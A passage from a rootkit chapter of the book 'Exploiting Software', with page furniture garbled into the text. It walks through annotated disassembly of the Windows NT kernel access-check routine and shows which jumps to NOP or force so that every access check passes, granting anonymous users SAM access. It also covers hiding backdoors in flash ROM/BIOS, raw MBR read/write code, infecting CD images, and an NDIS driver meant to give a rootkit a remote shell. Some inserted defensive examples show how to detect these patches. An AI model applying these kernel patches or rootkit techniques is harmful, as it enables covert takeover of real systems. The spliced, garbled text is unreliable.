                                                   ; we matched, 0 means
                                                   ; we did not
80199B07                 test    al, al
80199B09                 jz      short loc_80199B64 ; a match here is good,
                                                    ; since its the ALLOWED
                                                    ; list

                                                    ; so a 2-byte patch
                                                    ; nop out this jump

Here is where we identify the first bit of code to be patched. A comparison is made between the target's required access control and the source's identity. If a match occurs here, this means that the source is allowed to access the target. This is good, because as attackers we always want access. The jz (jump if zero) only occurs if we fail the match. Thus, to ensure we always match, we just nop the jz instruction. This takes 2 bytes (0x90 0x90). We are not done yet, though; there are a few more places that we need to patch:

80199B0B                 mov     eax, [esi+4]
80199B0E                 not     eax
80199B10                 and     edi, eax          ; whittles off the part
                                                   ; of EDI that we
                                                   ; matched ..
                                                   ; this chopping of
                                                   ; flags can go on through
                                                   ; many loops
                                                   ; remember, we are only
                                                   ; good if ALL of EDI is
                                                   ; chopped away...
80199B12                 jmp     short loc_80199B64
80199B14 ; ===========================================================================
80199B14
80199B14 loc_80199B14:                           ; CODE XREF: sub_80199836+2
80199B14                 cmp     al, 4             ; check for ACE type
80199B16                 jnz     short loc_80199B4B ; normally we aren't
                                                    ; this type, so jump
*** removed source here ***
80199B4B ; ===========================================================================
80199B4B
80199B4B loc_80199B4B:                           ; CODE XREF: sub_80199836+2
80199B4B                 cmp     al, 1             ; check for DENIED type
80199B4D                 jnz     short loc_80199B64
80199B4F                 lea     eax, [esi+8]      ; offset 8 is the SID
80199B52                 push    eax
80199B53                 push    [ebp+var_8]

80199B56 call sub_801997C2 Tech niqu es f or cr aft ing m aliciou s inpu t

; check the callers S

80199B5B test al, al The t echn ical det ails of b uf fer ov er f low s

; a match here is BAD

Root k it s

; since we are being

; DENIED Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. 80199B5D jz short loc_80199B64; so make JZ a normal ; JMP

Here we discov er one m or e place t hat needs t o be p at ch ed . The pr ev ious com par ison is m ade be

t he sou rce an d t he t ar get r equ ir em en t s. I n t h is case, if a m at ch occu rs, w e ar e ex plicit ly denied access. Obv iously t his is b ad and w e w ant t o av oid t he m at ch. Th e jz on ly ju mp s if t he m at ch fa t his case, w e alw ays wan t t h e ju m p t o occu r. We can pat ch t he jz t o m ak e it a st r aigh t jmp t hat alway s j um p r eg ard less of t h e pr eceding logic.



80199B5F    test    [esi+4], edi            ; we avoid this flag check w/ the patch
80199B62    jnz     short loc_80199B79
80199B64
80199B64 loc_80199B64:                      ; CODE XREF: sub_8019983
                                            ; sub_80199836+2D3
80199B64    mov     ecx, [ebp+var_10]       ; our loop routine, called from above and we loop around and around.
                                            ; var_10 is the number of ACEs
80199B67    inc     [ebp+var_C]             ; var_C is the current ACE
80199B6A    movzx   eax, word ptr [esi+2]   ; byte 3 is the offset to the next ACE
80199B6E    add     esi, eax                ; FFWD
80199B70    cmp     [ebp+var_C], ecx        ; check to see if we are done
80199B73    jb      loc_80199AE7            ; if not, go back up.
80199B79
80199B79 loc_80199B79:                      ; CODE XREF: sub_8019983
                                            ; sub_80199836+2B3
80199B79    xor     eax, eax                ; this is our general exit routine
80199B7B    test    edi, edi                ; if EDI isn't empty, then a DENIED state was reached above
80199B7D    jz      short loc_80199B91      ; so patch the JZ into a JMP so we never return ACCESS_DENIED

A final check is made here to determine what the result of the call will be. If any of the previous checks results in a denied state, then the jz will not jump. We obviously want the jump to occur no matter what, so we (once again) patch the jz into a jmp. This is the final patch, and the routine will now always evaluate to TRUE. The rest of the routine follows for those who are interested in the code:
80199B7F    mov     ecx, [ebp+arg_1C]
80199B82    mov     [ecx], eax
80199B84    mov     eax, [ebp+arg_24]
80199B87    mov     dword ptr [eax], 0C0000022h ; STATUS_ACCESS_DENIED
80199B8D    xor     al, al
80199B8F    jmp     short loc_80199C0C
80199B91 ; ===========================================================================
80199B91
80199B91 loc_80199B91:                      ; CODE XREF: sub_8019983
80199B91    mov     eax, [ebp+1Ch]
80199B94    mov     ecx, [ebp+arg_1C]       ; result code into &arg_1C
80199B97    or      eax, [ebp+arg_C]        ; checked passed in mask
80199B9A    mov     [ecx], eax
80199B9C    mov     ecx, [ebp+arg_24]       ; result code into &arg_24, should be zero
80199B9F    jnz     short loc_80199BAB      ; if everything above went OK, we should jump
80199BA1    xor     al, al
80199BA3    mov     dword ptr [ecx], 0C0000022h
80199BA9    jmp     short loc_80199C0C
80199BAB ; ===========================================================================
80199BAB
80199BAB loc_80199BAB:                      ; CODE XREF: sub_8019983
80199BAB    mov     dword ptr [ecx], 0      ; Good and Happy things, we passed!
80199BB1    test    ebx, ebx
80199BB3    jz      short loc_80199C0A
80199BB5    push    [ebp+arg_20]
80199BB8    push    dword ptr [ebp+var_2]
80199BBB    push    dword ptr [ebp-1]
80199BBE    push    ebx
80199BBF    call    sub_8019DC80
80199BC4    jmp     short loc_80199C0A
80199BC6 ; ===========================================================================
                                            ; removed code here
80199C0A loc_80199C0A:                      ; CODE XREF: sub_8019983
                                            ; sub_80199836+152
80199C0A    mov     al, 1
80199C0C
80199C0C loc_80199C0C:                      ; CODE XREF: sub_8019983
                                            ; sub_80199836+8F
80199C0C    pop     edi
80199C0D    pop     esi
80199C0E    pop     ebx
80199C0F    mov     esp, ebp
80199C11    pop     ebp
80199C12    retn    28h                     ; Outta Here!
80199C12 sub_80199836 endp

The result of the kernel patch shown here is that a remote user can connect to the target machine using the anonymous IPC$ pipe, no password required, and kill any process, download the SAM (equivalent of a user/password file) database, modify the SAM database, and upload/overwrite the SAM database. This is not good. The anonymous user can operate like a device driver and access any part of the trusted computing base in the target domain. Using our US navy example, this means that any computer program operating anywhere within the NT domain can access any other part of the domain with impunity. So, why does the navy insist on using NT?
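To make the three patched decision points concrete from the defender's side, here is a reference ACE walk written in C. It is an added example, not code from the book or from Windows: it reproduces the decisions the disassembly above makes (ACE type at offset 0, size word at offset 2, access mask at offset 4, SID at offset 8, the remaining desired-access bits playing the role of EDI) so that the effect of each two-byte patch can be read off directly. The ACL, principals and access masks are constructed sample data, SIDs are simplified to fixed 8-byte values (real SIDs are variable length), and the function names are this example's own.

```c
/* Reference discretionary access check over a constructed ACL.
 * Added example (not the book's code): mirrors the ACE walk in the listing
 * above so the three patched branches can be identified.  Assumptions:
 * fixed 8-byte SIDs, little-endian on-disk ACE layout, constructed data. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define ACCESS_ALLOWED_ACE_TYPE 0
#define ACCESS_DENIED_ACE_TYPE  1
#define STATUS_SUCCESS          0x00000000u
#define STATUS_ACCESS_DENIED    0xC0000022u   /* the constant stored at 80199B87 */

#define SID_LEN     8                         /* simplification: real SIDs vary in length */
#define ACE_HDR_LEN 8                         /* type, flags, size (2), mask (4) */
#define ACE_LEN     (ACE_HDR_LEN + SID_LEN)

#define READ_ACCESS  0x1u
#define WRITE_ACCESS 0x2u

/* Constructed principals (sample values, not real SIDs). */
static const uint8_t SID_ALICE[SID_LEN] = {1, 5, 0, 0, 0, 0, 0, 1};
static const uint8_t SID_BOB[SID_LEN]   = {1, 5, 0, 0, 0, 0, 0, 2};

/* Write one ACE in little-endian layout; returns the number of bytes written. */
static size_t put_ace(uint8_t *dst, uint8_t type, uint32_t mask, const uint8_t *sid)
{
    dst[0] = type;
    dst[1] = 0;                               /* flags */
    dst[2] = (uint8_t)(ACE_LEN & 0xFF);       /* size word: the "offset to the next ACE" */
    dst[3] = (uint8_t)(ACE_LEN >> 8);
    dst[4] = (uint8_t)(mask);
    dst[5] = (uint8_t)(mask >> 8);
    dst[6] = (uint8_t)(mask >> 16);
    dst[7] = (uint8_t)(mask >> 24);
    memcpy(dst + 8, sid, SID_LEN);
    return ACE_LEN;
}

/* Sample ACL in canonical order: deny Bob write, allow Bob read|write, allow Alice read. */
size_t build_sample_acl(uint8_t *buf, size_t *ace_count)
{
    size_t n = 0;
    n += put_ace(buf + n, ACCESS_DENIED_ACE_TYPE,  WRITE_ACCESS,               SID_BOB);
    n += put_ace(buf + n, ACCESS_ALLOWED_ACE_TYPE, READ_ACCESS | WRITE_ACCESS, SID_BOB);
    n += put_ace(buf + n, ACCESS_ALLOWED_ACE_TYPE, READ_ACCESS,                SID_ALICE);
    *ace_count = 3;
    return n;
}

/* Walk the ACEs the way the listing does; 'remaining' plays the role of EDI. */
uint32_t access_check(const uint8_t *acl, size_t acl_len, size_t ace_count,
                      const uint8_t *caller_sid, uint32_t desired, uint32_t *granted)
{
    uint32_t remaining = desired;
    size_t pos = 0;
    *granted = 0;
    for (size_t i = 0; i < ace_count && remaining != 0; i++) {
        if (pos + ACE_HDR_LEN > acl_len) return STATUS_ACCESS_DENIED;  /* malformed ACL: fail closed */
        uint8_t  type = acl[pos];
        uint16_t size = (uint16_t)(acl[pos + 2] | (acl[pos + 3] << 8));
        if (size < ACE_LEN || pos + size > acl_len) return STATUS_ACCESS_DENIED;
        uint32_t mask = (uint32_t)acl[pos + 4] | ((uint32_t)acl[pos + 5] << 8)
                      | ((uint32_t)acl[pos + 6] << 16) | ((uint32_t)acl[pos + 7] << 24);
        int match = memcmp(acl + pos + 8, caller_sid, SID_LEN) == 0;  /* the SID compare call */

        if (type == ACCESS_ALLOWED_ACE_TYPE && match)
            remaining &= ~mask;                /* not eax / and edi, eax: whittle EDI down */
        else if (type == ACCESS_DENIED_ACE_TYPE && match && (remaining & mask))
            return STATUS_ACCESS_DENIED;       /* the jz at 80199B5D: explicit deny */

        pos += size;                           /* movzx eax, word ptr [esi+2] / add esi, eax */
    }
    if (remaining != 0)
        return STATUS_ACCESS_DENIED;           /* test edi, edi at 80199B7B */
    *granted = desired;
    return STATUS_SUCCESS;
}
```

Each patch the text describes removes one of the three returns of STATUS_ACCESS_DENIED above: the first makes every allowed ACE match, the second skips the explicit deny, and the third ignores leftover bits in EDI. Because the patched instructions live in kernel text, a defender's integrity check is simple in principle: compare the in-memory bytes of this routine against the on-disk image (or a hash taken on a known-good system), and treat any 0x90 0x90 or short-jmp substitution at a conditional branch as a compromise of the trusted computing base.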

The Hardware Virus

While we are in the kernel, we have full access to the system and we can communicate with any [...] the address space. This means, among other things, that we can read/write to the BIOS memory on the motherboard or in peripheral hardware.

In the "old days," BIOS memory was stored in ROM or in EEPROM chips, which could not be updated from software. These older systems require the chips to be replaced or manually erased and rewritten. Of course this isn't very cost effective, so new systems use EEPROM chips, otherwise known as flash ROM. Flash ROM can be rewritten from software.

A given computer can have several megabytes of flash ROM floating around on various controllers and the motherboard. These flash ROM chips are almost never fully utilized, and this leaves us with tremendous amounts of room to store back door information and viruses. The compelling thing about using these memory spaces is that they are hard to audit and almost never visible to software running on a system. To access the hardware memory requires driver-level access. Furthermore, this me[...] immune against reboots and system reinstallation.

One key advantage of a hardware virus is that it will survive a reboot and a system reinstallation. If someone suspects a viral infection, restoring the system from tape or backup will not help. The hardware virus has always been and will remain one of the best kept secrets of the "black magic" hackers. There is a disadvantage to hardware viruses, however. They only work on a particular t[...]. That is, any given hardware virus must be written to infect the specific hardware of the target. This means the virus will not easily propagate to other systems (if it can be propagated at all). This i[...] problem for many uses in warfare, however. Many times the hardware virus is being used as a b[...] or a method [...] traffic. In this case, a virus may not need to self-replicate. In fact, self replication may not be desired. A hardware virus may be designed to impart false data to a system or to cause the system to ignore certain events. Imagine an anti-aircraft radar that uses the VX-Works OS. Within the system [...] several flash RAM chips. A virus installed in one of these chips has trusted access to the entire b[...]. The virus has only one purpose—to cause the radar to ignore certain types of radar signatures.

Viruses have long been detected in the wild that write themselves into the motherboard BIOS memory. In the late 1990s, the so-called F00F bug was able to crash a laptop completely. Although the CIH virus (Chernobyl) was widely popularized in the media, virus code that used the BIOS was published long before the release of CIH.[3]

[3] For more on CIH, go to http://www.f-secure.com/cih/.

EEPROM memory is fairly common on many systems. Ethernet cards, video cards, and multimedia peripherals may all contain EEPROM memory. The hardware memory may contain flash firmware [...] firmware may just be used for data storage. In the case of a backdoor, overwriting firmware is s[...] to other approaches because the change will persist even if the system is cleaned and reinstalled. Of course, the task of overwriting firmware requires a detailed understanding of the target hardware peripheral. But in the case of the motherboard BIOS, the procedure is fairly straightforward.

Reading and Writing Hardware Memory

Nonvolatile memory chips are found in a variety of hardware devices: TV tuners and remote controls, CD players, cordless and cellular phones, fax machines, cameras, radios, automotive airbags, antilock brakes, odometers, keyless entry systems, printers and copiers, modems, pagers, satellite receivers, bar code readers, point-of-sale terminals, smart cards, lock boxes, garage door openers, and test and measurement equipment.

Flash ROM can be accessed by simple in and out instructions. Typically a flash ROM chip will contain a control register and a data port. Command messages are placed in the control register and the data port is used to read or write to the flash memory. In some cases, the memory used by the chip is "mapped" into physical memory, which means it can be accessed as normal linear memory.

Typically, a command is "shifted" to the ROM chip via the out instruction. Depending on the language, the in and out instructions may have subtle differences, but otherwise they are all doing the same thing. For example:

OUT( some_byte_value, eeprom_register_address );

On an NT PC system, there are chunks of memory mapped between F0000000 and FFFFFFFF that contain empty spaces. A backdoor or rootkit program may only consume a few hundred bytes, so [...] some empty space to store such a beast may not be that difficult. This region of memory is cons[...] various peripherals and the motherboard. The memory between 0000 and FFFF usually stores [...] on hardware, and so [...] input/output ports of various devices and can be used to configure settings [...]. The region between F9000 and F9FFF is a 4K chunk reserved for the motherboard BIOS. The region between A0000 and C7FFF is used for video buffers and video card configuration.

Example: Read/Write to the Keyboard Hardware

Here we illustrate reading and writing to hardware using a rootkit. Our example will set the LED indicators on the keyboard. For fun, we also illustrate how to hard boot the computer. This is a v[...] starting place for those who want to control more complex hardware from a rootkit.

An interesting form of communication can be designed using the LEDs of the keyboard. The 8042 keyboard controller chip can be used to turn on/off the various keyboard LEDs. This can be used as a covert form of communication between a rootkit and the user of a terminal. Our code is commented inline:

// BASIC DEVICE DRIVER TO SET KEYBOARD LEDs
// from www.rootkit.com
#include "ntddk.h"
#include                        // name of the second header is missing from this copy of the text

VOID rootkit_command_thread(PVOID context);

HANDLE  gWorkerThread;
PKTIMER gTimer;
PKDPC   gDPCP;

UCHAR g_key_bits = 0;

What follows are various "defines" for the hardware operation. These are found in the documentation for the 8042 keyboard controller chip. The input/output "port" is 0x60 or 0x64, depending on the operation. These ports are designed for single-byte operations. The command byte that indicates that we want to set the LEDs is 0xED.

// commands
#define READ_CONTROLLER     0x20
#define WRITE_CONTROLLER    0x60

// command bytes
#define SET_LEDS            0xED
#define KEY_RESET           0xFF

// responses from keyboard
#define KEY_ACK             0xFA    // ack
#define KEY_AGAIN           0xFE    // send again

// 8042 ports
// when you read from port 64, this is called STATUS_BYTE
// when you write to port 64, this is called COMMAND_BYTE
// read and write on port 60 is called DATA_BYTE
PUCHAR KEYBOARD_PORT_60 = (PUCHAR)0x60;
PUCHAR KEYBOARD_PORT_64 = (PUCHAR)0x64;

// status register bits
#define IBUFFER_FULL        0x02
#define OBUFFER_FULL        0x01

When we send the command for setting the LEDs, we must immediately follow the command with another byte. The second byte indicates which LEDs we want to toggle. The following bits represent the scroll lock, num lock, and caps lock indicators. A bit set to 1 causes the corresponding LED to be illuminated.
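The two-byte exchange just described (poll the status byte, send 0xED, wait for the keyboard's acknowledgement, send the LED mask, resend on 0xFE) is easiest to see with both sides present. The following is an added example, not the rootkit.com driver and not code from the book: it models the 8042 controller and keyboard as a small state machine so the driver-side protocol can be run and tested offline, with the simulator standing in for the port I/O that a real driver would perform. The port numbers, command bytes, responses and status bits are the documented 8042 values quoted in the text; the NUM_LOCK_BIT and CAPS_LOCK_BIT values (0x02 and 0x04, the documented LED bit positions) are stated here as an assumption because the page's own defines are cut off, and the simulator's behaviour is constructed for illustration.

```c
/* Simulated 8042 LED handshake.  Added example, not the book's driver.
 * The kbc_sim_t model is constructed; on real hardware the two sim_* calls
 * would be the driver's port reads and writes to 0x64 and 0x60. */
#include <stdint.h>
#include <string.h>

#define KEYBOARD_PORT_60 0x60     /* data port */
#define KEYBOARD_PORT_64 0x64     /* status (read) / command (write) port */
#define SET_LEDS         0xED
#define KEY_ACK          0xFA
#define KEY_AGAIN        0xFE
#define IBUFFER_FULL     0x02     /* status bit: controller still busy with our last byte */
#define OBUFFER_FULL     0x01     /* status bit: a response byte is waiting on port 0x60 */
#define SCROLL_LOCK_BIT  0x01
#define NUM_LOCK_BIT     0x02     /* assumption: documented 8042 LED bit positions */
#define CAPS_LOCK_BIT    0x04

/* Constructed model of the controller + keyboard, not real hardware. */
typedef struct {
    uint8_t status;         /* value a read of port 0x64 returns */
    uint8_t out_byte;       /* value a read of port 0x60 returns */
    int     expecting_mask; /* 1 after 0xED was accepted: the next data byte is the LED mask */
    uint8_t leds;           /* current LED state */
    int     resend_budget;  /* number of times the keyboard answers 0xFE before cooperating */
    int     writes;         /* data bytes the driver has written */
} kbc_sim_t;

static uint8_t sim_in(kbc_sim_t *s, uint16_t port)
{
    if (port == KEYBOARD_PORT_64) return s->status;
    s->status &= (uint8_t)~OBUFFER_FULL;      /* reading port 0x60 drains the output buffer */
    return s->out_byte;
}

static void sim_out(kbc_sim_t *s, uint16_t port, uint8_t val)
{
    if (port != KEYBOARD_PORT_60) return;     /* this model only handles the data port */
    s->writes++;
    if (s->resend_budget > 0) {               /* keyboard asks for a retransmission */
        s->resend_budget--;
        s->out_byte = KEY_AGAIN;
    } else if (s->expecting_mask) {           /* second byte of the sequence: the LED mask */
        s->leds = val & 0x07;
        s->expecting_mask = 0;
        s->out_byte = KEY_ACK;
    } else if (val == SET_LEDS) {             /* first byte of the sequence */
        s->expecting_mask = 1;
        s->out_byte = KEY_ACK;
    } else {
        s->out_byte = KEY_AGAIN;              /* anything else is rejected */
    }
    s->status |= OBUFFER_FULL;
}

/* Driver side: never write while the input buffer is full. */
static int wait_input_clear(kbc_sim_t *s)
{
    for (int i = 0; i < 1000; i++)
        if (!(sim_in(s, KEYBOARD_PORT_64) & IBUFFER_FULL)) return 1;
    return 0;                                 /* timeout */
}

/* Driver side: wait for a response byte; -1 on timeout. */
static int wait_response(kbc_sim_t *s)
{
    for (int i = 0; i < 1000; i++)
        if (sim_in(s, KEYBOARD_PORT_64) & OBUFFER_FULL) return sim_in(s, KEYBOARD_PORT_60);
    return -1;
}

/* Send one byte, retrying on KEY_AGAIN a bounded number of times; 1 on ACK. */
static int send_byte(kbc_sim_t *s, uint8_t b)
{
    for (int attempt = 0; attempt < 3; attempt++) {
        if (!wait_input_clear(s)) return 0;
        sim_out(s, KEYBOARD_PORT_60, b);
        int r = wait_response(s);
        if (r == KEY_ACK) return 1;
        if (r != KEY_AGAIN) return 0;         /* timeout or unexpected byte: give up */
    }
    return 0;
}

/* The two-byte sequence the text describes: command 0xED, then the mask. */
int set_keyboard_leds(kbc_sim_t *s, uint8_t mask)
{
    return send_byte(s, SET_LEDS) && send_byte(s, mask);
}
```

The bounded retry loop and the timeouts are the part worth copying: a driver that writes to port 0x60 without checking IBUFFER_FULL, or that resends forever on 0xFE, can wedge the controller and hang the keyboard for every user of the machine.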

// flags for keyboard LEDS
#define SCROLL_LOCK_BIT     (0x01 [...]

[text missing: the rest of the keyboard driver and the start of the flash ROM discussion are absent from this copy; it resumes inside a Linux JEDEC flash-probe routine]

    [...] addr_unlock1, [...] CFI_DEVICETYPE_X8, NULL);
    cfi_send_gen_cmd(0x55, cfi->addr_unlock2, base, map, cfi, CFI_DEVICETYPE_X8, NULL);
}
cfi_send_gen_cmd(0x90, cfi->addr_unlock1, base, map, cfi, CFI_DEVICETYPE_X8, NULL);

followed by

static inline u32 jedec_read_mfr(struct map_info *map, __u32 base,
                                 struct cfi_private *cfi)
{
    u32 result, mask;
    mask = (1 << (cfi->device_type * 8)) - 1;
    result = cfi_read(map, base);
    result &= mask;
    return result;
}

static inline u32 jedec_read_id(struct map_info *map, __u32 base,
                                struct cfi_private *cfi)
{
    int osf;
    u32 result, mask;
    osf = cfi->interleave * cfi->device_type;
    mask = (1 << (cfi->device_type * 8)) - 1;
    result = cfi_read(map, base + osf);
    result &= mask;
    return result;
}

static inline void jedec_reset(u32 base, struct map_info *map,
                               struct cfi_private *cfi)
{
    /* Reset */
    cfi_send_gen_cmd(0xF0, 0, base, map, cfi, cfi->device_type, NULL);
    /* Some misdesigned Intel chips do not respond for 0xF0 for a reset,
     * so ensure we're in read mode.  Send both the Intel and the AMD command
     * for this.  Intel uses 0xff for this, AMD uses 0xff for nop, so
     * this should be safe. */
    cfi_send_gen_cmd(0xFF, 0, base, map, cfi, cfi->device_type, NULL);
}

/* Manufacturers */
#define MANUFACTURER_AMD        0x0001
#define MANUFACTURER_ATMEL      0x001f
#define MANUFACTURER_FUJITSU    0x0004
#define MANUFACTURER_INTEL      0x0089
#define MANUFACTURER_MACRONIX   0x00C2
#define MANUFACTURER_ST         0x0020
#define MANUFACTURER_SST        0x00BF
#define MANUFACTURER_TOSHIBA    0x0098

/* AMD */
#define AM29F800BB      0x2258
#define AM29F800BT      0x22D6
#define AM29LV800BB     0x225B

/* Fujitsu */
#define MBM29LV650UE    0x22D7
#define MBM29LV320TE    0x22F6

To wrap up our discussion of hardware, EEPROM chips remain a prime area for storing subversive [...]. As more embedded devices become available, the EEPROM-based virus will be more applicable and dangerous. Legitimate code exists that will query for EEPROM devices and perform operations. Practitioners who wish to experiment with EEPROM code will need some test machines that have embedded EEPROM. Device driver code found in Linux and Windows provides plenty of fodder for experiments.

Low-Level Disk Access Anot h er t r adit ional m et hod of st or in g vir uses has b een on boot b lock s, flop py disk s, and har d dr iv es. I nt er est in gly enoug h, t h ese t echniqu es st ill wor k t od ay and it ' s quit e sim ple t o access t he boot block of a dr iv e. The f ollow ing code illust r at es a sim ple m et h od t o r ead an d wr it e •fr om t he m ast Table of Content er boot recors d on an NT sy st em . •

I ndex

Expl oit ing Softw a re How to Br e ak Code

Reading/Writing the Master Boot Record (MBR) By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley To ob t ain access t o t h e MBR you m ust hav e r aw r ead / w rit e access t o t h e phy sical dr ive it self. Pub aDat e: February 4 Using sim ple call 17, t o 200 CreateFile an d t he p rop er object n ame, y ou can op en an y of t he SBN: 786 95 -8 f ollow ing code show s how t o open a han dle t o t he f irst phy sical dr ive dr iv es Ion a 0sy20 st1-em. The and subsequ Pages: 51en 2 t ly read t he f ir st 51 2 b yt es of d at a f rom it . This b lock of d at a cont ain s t he cont ent s of t he f ir st d r iv e sect or , ot herw ise k now n as t he MBR.

    #include <windows.h>

    char  mbr_data[512];
    DWORD dwBytesRead;

    /* Open the first physical drive by its NT object name. Raw access to
       the disk requires administrative privileges. */
    HANDLE hDriver = CreateFile("\\\\.\\physicaldrive0",
                                GENERIC_READ | GENERIC_WRITE,
                                FILE_SHARE_READ | FILE_SHARE_WRITE,
                                0,
                                OPEN_EXISTING,
                                0,
                                0);
    if (hDriver != INVALID_HANDLE_VALUE)
    {
        /* The first 512-byte sector of the drive is the MBR. */
        ReadFile( hDriver, mbr_data, 512, &dwBytesRead, NULL );
        CloseHandle( hDriver );
    }
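As an added example (not code from the book or from rootkit.com), the following C parses the 512-byte sector that the ReadFile call above returns, checks the 0x55AA boot signature, decodes the four partition entries, and compares the sector against a stored baseline so that a defender can tell a patched boot-code region from a repartition. The sample sector is constructed inline, and the MBR_CHANGED_* flags and the FNV-1a fingerprint are this example's own names.

```c
/* Added MBR baseline check; parses a 512-byte sector like the one read above. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>
#define MBR_SIZE            512
#define MBR_PART_OFFSET     446   /* partition table starts here */
#define MBR_PART_COUNT      4
#define MBR_PART_ENTRY_SIZE 16
#define MBR_SIG_OFFSET      510   /* 0x55 0xAA boot signature    */
/* Change flags returned by mbr_diff() (names chosen for this example). */
#define MBR_CHANGED_BOOT_CODE 0x1
#define MBR_CHANGED_PART_TBL  0x2
#define MBR_CHANGED_SIG       0x4
typedef struct {
    uint8_t  status;     /* 0x80 = active/bootable */
    uint8_t  type;       /* partition type id, e.g. 0x07 */
    uint32_t lba_first;  /* first sector, little-endian on disk */
    uint32_t sectors;    /* length in sectors */
} mbr_partition;
typedef struct {
    int           signature_ok;
    uint32_t      boot_code_fnv1a;   /* fingerprint of bytes 0..445 */
    mbr_partition part[MBR_PART_COUNT];
} mbr_info;
static uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
/* FNV-1a over the 446-byte boot code region: a cheap fingerprint to store
 * as a baseline (use a real hash such as SHA-256 in production). */
uint32_t mbr_boot_code_fnv1a(const uint8_t *mbr)
{
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < MBR_PART_OFFSET; i++) {
        h ^= mbr[i];
        h *= 16777619u;
    }
    return h;
}
/* Parse a sector. Returns 0 on success, -1 if the length or the boot
 * signature is wrong; the partition fields are still filled in for triage. */
int mbr_parse(const uint8_t *buf, size_t len, mbr_info *out)
{
    if (buf == NULL || out == NULL || len != MBR_SIZE) return -1;
    memset(out, 0, sizeof(*out));
    out->signature_ok = (buf[MBR_SIG_OFFSET] == 0x55 &&
                         buf[MBR_SIG_OFFSET + 1] == 0xAA);
    out->boot_code_fnv1a = mbr_boot_code_fnv1a(buf);
    for (int i = 0; i < MBR_PART_COUNT; i++) {
        const uint8_t *e = buf + MBR_PART_OFFSET + i * MBR_PART_ENTRY_SIZE;
        out->part[i].status    = e[0];
        out->part[i].type      = e[4];
        out->part[i].lba_first = read_le32(e + 8);
        out->part[i].sectors   = read_le32(e + 12);
    }
    return out->signature_ok ? 0 : -1;
}
/* Compare a freshly read sector with a stored baseline; returns MBR_CHANGED_*
 * bits so a monitor can tell a boot-code patch from a repartition. */
int mbr_diff(const uint8_t *baseline, const uint8_t *current)
{
    int flags = 0;
    if (memcmp(baseline, current, MBR_PART_OFFSET) != 0)
        flags |= MBR_CHANGED_BOOT_CODE;
    if (memcmp(baseline + MBR_PART_OFFSET, current + MBR_PART_OFFSET,
               MBR_PART_COUNT * MBR_PART_ENTRY_SIZE) != 0)
        flags |= MBR_CHANGED_PART_TBL;
    if (memcmp(baseline + MBR_SIG_OFFSET, current + MBR_SIG_OFFSET, 2) != 0)
        flags |= MBR_CHANGED_SIG;
    return flags;
}
/* Constructed sample sector (not captured from a real disk): NOP-filled boot
 * code, one active type-0x07 partition at LBA 2048 of 1000000 sectors. */
void make_sample_mbr(uint8_t *buf)
{
    memset(buf, 0x90, MBR_PART_OFFSET);
    memset(buf + MBR_PART_OFFSET, 0, MBR_SIZE - MBR_PART_OFFSET);
    uint8_t *e = buf + MBR_PART_OFFSET;
    e[0] = 0x80;
    e[4] = 0x07;
    e[8]  = 0x00; e[9]  = 0x08; e[10] = 0x00; e[11] = 0x00;  /* 2048    LE */
    e[12] = 0x40; e[13] = 0x42; e[14] = 0x0F; e[15] = 0x00;  /* 1000000 LE */
    buf[MBR_SIG_OFFSET] = 0x55;
    buf[MBR_SIG_OFFSET + 1] = 0xAA;
}
int main(void)
{
    uint8_t baseline[MBR_SIZE], current[MBR_SIZE];
    mbr_info info;
    make_sample_mbr(baseline);
    memcpy(current, baseline, MBR_SIZE);
    current[0] = 0xEB;   /* simulate a patched first boot-code byte */
    mbr_parse(baseline, MBR_SIZE, &info);
    printf("part0 type=0x%02x lba=%u fnv=%08x changed=%d\n", info.part[0].type,
           (unsigned)info.part[0].lba_first, (unsigned)info.boot_code_fnv1a,
           mbr_diff(baseline, current));
    return 0;
}
```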

Infecting CD-ROM Images

CD-ROMs use the ISO9660 file system. These can be infected with virus programs in a similar way that floppy disks can be infected with a virus. A bootable CD can most certainly contain a virus that is activated on boot. Another trick is using the AUTORUN.INF file. The AUTORUN.INF file causes programs to be launched automatically when the CD is inserted. This feature is often on by default. Lastly, files on the CD can simply be infected using standard tricks. There is nothing stopping a virus or rootkit from accessing a CD-R drive and burning information to a mounted (writable) CD disk.[7]

[7] More on the idea of infecting CD images can be found in the 'zine 29A Labs, issue 6, "Infecting ISO CD Images" by ZOMBiE.


Adding Network Support to a Driver

Allowing a rootkit driver to talk to the network adds a final but critical touch: it allows the code to be accessed remotely. It is possible to embed a TCP/IP stack into a driver and open a remote shell. In fact, the popular kernel-mode debugger called SoftIce has this feature. The NTROOT rootkit distributed from www.rootkit.com has sample code that exposes a TCP/IP shell. Under Windows NT, an easy way to build network support is to use the NDIS library. Unfortunately, not many device driver books cover the subject of network device drivers. Thus, use of NDIS has not been well documented outside the DDK.

Using the NDIS Library

Microsoft supplies the NDIS library for network and protocol drivers to implement their own stack independent of the network card. We can use this library to build a stack and communicate with the network. This is one way that a rootkit driver can provide an interactive shell. The first step in using NDIS is to register a set of callback functions for NDIS operations. The OnXXX values are pointers to callback functions.[8]

[8] Complete source for these examples can be obtained from http://www.rootkit.com

    NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject,
                          IN PUNICODE_STRING theRegistryPath )
    {
        NDIS_PROTOCOL_CHARACTERISTICS aProtocolChar; // DD
        UNICODE_STRING aDriverName;
        /* status locals; aNdisProtocolHandle, aProtoName, anOpenP,
           aDeviceExtension and aMediumArray live in the parts of the
           driver elided below ("...") */
        NDIS_STATUS aStatus;
        NDIS_STATUS aErrorStatus;

        /*
         * init network sniffer - this is all standard and
         * documented in the DDK.
         */
        RtlZeroMemory( &aProtocolChar, sizeof(NDIS_PROTOCOL_CHARACTERISTICS));
        aProtocolChar.MajorNdisVersion            = 3;
        aProtocolChar.MinorNdisVersion            = 0;
        aProtocolChar.Reserved                    = 0;
        aProtocolChar.OpenAdapterCompleteHandler  = OnOpenAdapterDone;
        aProtocolChar.CloseAdapterCompleteHandler = OnCloseAdapterDone;
        aProtocolChar.SendCompleteHandler         = OnSendDone;
        aProtocolChar.TransferDataCompleteHandler = OnTransferDataDone;
        aProtocolChar.ResetCompleteHandler        = OnResetDone;
